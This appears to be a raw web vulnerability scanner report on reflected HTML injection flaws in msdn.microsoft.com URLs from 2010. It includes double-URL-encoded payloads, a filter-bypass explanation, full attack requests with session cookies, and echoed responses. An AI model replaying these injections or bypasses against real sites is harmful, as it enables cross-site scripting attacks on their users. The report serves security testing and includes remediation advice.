msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:25 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms376734.aspxf5baf"><a>d814d454776" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbad9%2522%253e%253ca%253e8df1c91ad96 was submitted in the REST URL parameter 1. This input was echoed as dbad9"><a>8df1c91ad96 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usdbad9%2522%253e%253ca%253e8df1c91ad96/library/ms689718(VS.85 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9211
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:57 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usdbad9"><a>8df1c91ad96/library/ms689718(VS.85" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dc98%2522%253e%253ca%253ea7defceea7f was submitted in the REST URL parameter 2. This input was echoed as 5dc98"><a>a7defceea7f in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library5dc98%2522%253e%253ca%253ea7defceea7f/ms689718(VS.85 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9212
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:16:06 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library5dc98"><a>a7defceea7f/ms689718(VS.85" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 597f0%2522%253e%253ca%253e4ee946ae8f7 was submitted in the REST URL parameter 3. This input was echoed as 597f0"><a>4ee946ae8f7 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/ms689718(VS.85597f0%2522%253e%253ca%253e4ee946ae8f7 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9211
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:16:12 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms689718(VS.85597f0"><a>4ee946ae8f7" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87014%2522%253e%253ca%253e61c23bd9200 was submitted in the REST URL parameter 1. This input was echoed as 87014"><a>61c23bd9200 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:55:40 GMT
Content-Length: 9188
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us87014"><a>61c23bd9200/library/ms689718(VS.85)" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbb0d%2522%253e%253ca%253e61e6c453a14 was submitted in the REST URL parameter 2. This input was echoed as cbb0d"><a>61e6c453a14 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:56:11 GMT
Content-Length: 9189
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarycbb0d"><a>61e6c453a14/ms689718(VS.85)" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 598c0%2522%253e%253ca%253e64b1072645f was submitted in the REST URL parameter 3. This input was echoed as 598c0"><a>64b1072645f in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:56:41 GMT
Content-Length: 9198
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms689718(VS.85).aspx598c0"><a>64b1072645f" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9acb%2522%253e%253ca%253e41d5fa23755 was submitted in the REST URL parameter 1. This input was echoed as d9acb"><a>41d5fa23755 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usd9acb%2522%253e%253ca%253e41d5fa23755/library/ms689718(v=vs.85 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9215
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:23 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usd9acb"><a>41d5fa23755/library/ms689718(v=vs.85" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0f03%2522%253e%253ca%253e6c8979e7095 was submitted in the REST URL parameter 2. This input was echoed as f0f03"><a>6c8979e7095 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryf0f03%2522%253e%253ca%253e6c8979e7095/ms689718(v=vs.85 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9215
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:38 GMT
